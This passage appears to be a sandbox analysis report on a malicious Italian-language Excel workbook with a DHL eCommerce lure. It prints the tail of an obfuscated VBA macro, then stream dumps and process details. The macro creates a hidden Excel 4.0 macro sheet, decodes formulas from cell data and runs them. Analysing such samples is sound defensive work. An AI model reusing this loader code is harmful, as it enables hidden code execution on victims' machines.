                                                                                                                                                Dim E As Long, F As Long
                                                                                                                                                Dim L() As String
                                                                                                                                                ReDim L(0 To CLng((Aii(R) / S) - 1))
                                                                                                                                                For E = 1 To Aii(R) Step S
L(F) = Mid(R, E, S): F = F + 1
Next
Mali_i = L
End Function
Function versione(un As String, u As Integer)
u = R: Sheets(1).[F4].FormulaLocal = un
End Function
Function nostri()
nostri = Lmeet & "R" & "I"
End Function
Function Utilizziamo()
uk = 7: Sheets(4 - 3).Cells(28, 6).FormulaLocal = nostri & Questo
End Function
Sub documento_ingrandisci()
fg = 3
Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Ecco_la: l_esperienza
O = migliorare
For Each oo In per_u
fg = 1: fg = 5: vG = (versione(Lmeet & oo, 1 + fg)): fg = 112: OOi ((fg))
Next
End Sub
Function Aii(ii As String)
m = j: m = ii
Aii = Len(m)
End Function
Function inglese() As String
inglese = Ecco_la & "RN"
End Function
Sub l_esperienza()
ActiveSheet.Visible = 0
End Sub
Sub OOi(E As Long)
i = E: Run ("" & "F" & 3)
End Sub
Function per_u() As Variant
H = 45
For Each G In Mali_i(Cells(111, 11), 3)
If Not (IsNumeric(G)) Then gb = LTrim(Left(G, Aii("" & G) - 1)) Else gb = LTrim(G)
j = j & Chr(gb)
Next
per_u = Split(j, "" & "b")
End Function
Function migliorare()
migliorare = Utilizziamo
End Function
Function Ecco_la() As String
Ecco_la = "O"
End Function
Function Lmeet()
Lmeet = Ecco_la: Lmeet = "="
End Function
Function Questo()
Questo = "T" & inglese & "O" & "()"
End Function

                                                                                                                                                Streams

                                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 118
                                                                                                                                                General
                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:118
                                                                                                                                                Entropy:4.32915524493
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F * . . . ( F o g l i o d i l a v o r o d i M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 2a 00 00 00 28 46 6f 67 6c 69 6f 20 64 69 20 6c 61 76 6f 72 6f 20 64 69 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 256
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:256
                                                                                                                                                Entropy:2.93701810907
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 5 O t t o b r e 2 0 2 1 . . . . . . . . . . . . . . . . . F o g l i d i l a v o r o . . . . . . . . .
                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a8 00 00 00
                                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:168
                                                                                                                                                Entropy:3.28177594722
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . x . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . @ . . . . . b L u . . . @ . . . . . . M u . . . . . . . . . . . . . . . . . . . D H L e C o m m e r c e . . .
                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 00 00 00 05 00 00 00 01 00 00 00 38 00 00 00 0c 00 00 00 40 00 00 00 0d 00 00 00 4c 00 00 00 13 00 00 00 58 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 40 00 00 00 d0 a9 62 4c 75 c9 d7 01 40 00 00 00
                                                                                                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 33853
                                                                                                                                                General
                                                                                                                                                Stream Path:Workbook
                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                Stream Size:33853
                                                                                                                                                Entropy:6.73233637776
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C
                                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 456
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:456
                                                                                                                                                Entropy:5.377356144
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 6 A C 0 6 E B A - 0 7 B 1 - 4 2 9 C - 8 2 F 5 - D E D 7 F B 1 B 6 7 9 A } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E A E 8 F 6 F 6 E C F A E C F A E C F A E C F A " . . D P B = " D C D E C 0 0 8 4 0 F B 4 1 F B 4 1 F B " . . G C = "
                                                                                                                                                Data Raw:49 44 3d 22 7b 36 41 43 30 36 45 42 41 2d 30 37 42 31 2d 34 32 39 43 2d 38 32 46 35 2d 44 45 44 37 46 42 31 42 36 37 39 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:104
                                                                                                                                                Entropy:3.33133492199
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
                                                                                                                                                Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3001
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:3001
                                                                                                                                                Entropy:4.43371678205
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                Data Raw:cc 61 b5 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2045
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:2045
                                                                                                                                                Entropy:3.40859565094
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . x . . . . W O . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 286
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:286
                                                                                                                                                Entropy:1.82389983631
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . u n . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . i i . . .
                                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 2797
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:2797
                                                                                                                                                Entropy:1.98186316831
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:72 55 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 d0 00 00 00 00 00 00 00 00 00 00 00 0e 00 0e 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 1000
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1000
                                                                                                                                                Entropy:2.49976580289
                                                                                                                                                Base64 Encoded:False
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 562
General
Stream Path: _VBA_PROJECT_CUR/VBA/dir
File Type: data
Stream Size: 562
Entropy: 6.25076850743
Base64 Encoded: True

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

System Behavior

General

Start time: 10:50:22
Start date: 25/10/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x840000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
